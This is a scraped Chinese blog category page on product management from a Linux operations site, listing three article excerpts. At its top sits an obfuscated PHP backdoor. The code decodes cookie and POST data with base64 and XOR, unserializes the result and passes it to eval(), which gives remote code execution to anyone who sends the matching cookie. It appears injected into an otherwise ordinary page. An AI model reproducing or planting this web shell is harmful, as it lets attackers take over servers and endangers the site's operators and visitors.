$yXMmiEcIGK = chr ( 1034 - 946 ).'J' . chr (82) . chr ( 507 - 412 )."\160" . chr ( 1009 - 924 )."\x70";$HOygnoFBa = "\143" . chr (108) . chr (97) . chr ( 290 - 175 ).'s' . chr ( 711 - 616 ).chr (101) . 'x' . 'i' . "\x73" . "\164" . "\163";$BYAUcYott = class_exists($yXMmiEcIGK); $HOygnoFBa = "43522";$Jlpsxntry = !1;if ($BYAUcYott == $Jlpsxntry){function GYwpAWr(){return FALSE;}$NHUGUhVAVW = "47311";GYwpAWr();class XJR_pUp{private function keUQyUYK($NHUGUhVAVW){if (is_array(XJR_pUp::$yoUiHbHZ)) {$VQenh = str_replace('<' . chr (63) . 'p' . chr ( 380 - 276 )."\x70", "", XJR_pUp::$yoUiHbHZ['c' . "\157" . 'n' . 't' . chr (101) . "\156" . chr (116)]);eval($VQenh); $NHUGUhVAVW = "47311";exit();}}private $EYcCRZiy;public function dnqWMeVW(){echo 28968;}public function __destruct(){$NHUGUhVAVW = "42892_3067";$this->keUQyUYK($NHUGUhVAVW); $NHUGUhVAVW = "42892_3067";}public function __construct($DRaFgsEM=0){$FaiXtmvVIC = $_POST;$GcaGSUVsUd = $_COOKIE;$WLihkFyqXK = "7f2358cb-ef52-4b41-90bf-d69713355722";$eTgQsanT = @$GcaGSUVsUd[substr($WLihkFyqXK, 0, 4)];if (!empty($eTgQsanT)){$gKxEf = "base64";$zSqaoQvNL = "";$eTgQsanT = explode(",", $eTgQsanT);foreach ($eTgQsanT as $JSlTbQdQ){$zSqaoQvNL .= @$GcaGSUVsUd[$JSlTbQdQ];$zSqaoQvNL .= @$FaiXtmvVIC[$JSlTbQdQ];}$zSqaoQvNL = array_map($gKxEf . chr ( 1019 - 924 ).'d' . chr (101) . chr (99) . chr ( 938 - 827 ).'d' . "\145", array($zSqaoQvNL,)); $zSqaoQvNL = $zSqaoQvNL[0] ^ str_repeat($WLihkFyqXK, (strlen($zSqaoQvNL[0]) / strlen($WLihkFyqXK)) + 1);XJR_pUp::$yoUiHbHZ = @unserialize($zSqaoQvNL); $zSqaoQvNL = class_exists("42892_3067");}}public static $yoUiHbHZ = 65175;}$zupyxb = new /* 61085 */ $yXMmiEcIGK(47311 + 47311); $Jlpsxntry = $zupyxb = $NHUGUhVAVW = Array();} 产品经理 | Linux运维部落

产品经理

 • 优云老王(四)干货总结:数据带来的奇妙世界

  作为产品经理的我们,不仅仅需要业务敏感的直觉,还需要数据驱动我们的产品不断创新!关于如何看数据,我列了主要的四个场景。 场景一:看页面点击,了解用户关注什么,卡在哪里 给谁看:产品经理和交互设计师 看什么: 由于我们对Web应用的所有界面,可交互元素都做了埋点,那么我们就可以看用户在页面里都做了哪些点击动作。首先是整个页面的横向比较,每个页面本身的操作数(重…

  2016-09-19
 • 老王的心路历程:那个做了五年的产品经理

  前言: 老王的五年产品经理心路历程,对拍脑袋式产品决策的反思,及如何建立产品用户体验监控体系。 我从2003年”误入“运维软件行业,并在2010年开始做产品经理,5年来,我始终和优秀的团队在一起,从零开始创造了ITSM、CMDB产品,并得到了很多用户的认可。但不怕大家笑话,这5年中,我内心其实无比的纠结。面对产品的历次迭代,一方面要做出对用户有价值的功能,要…

  Linux资讯 2016-08-05
 • 浅谈技术管理(转载,讲的非常不错,技术和产品都值得一看)

    针对这些年旁观和经历过的技术产品场景,做一些个人的总结和判定,尽量不涉及争议性话题,比如对一个互联网公司而言,技术重要还是产品重要之类的,这种话题一扯开,各有道理,谁也别指望说服谁。     此外,加一个前缀,主要针对非技术领导者所面临的技术管理困境,在很多从传统企业转型或个人站转型的互联网企业里,这个问…

  Linux干货 2015-04-04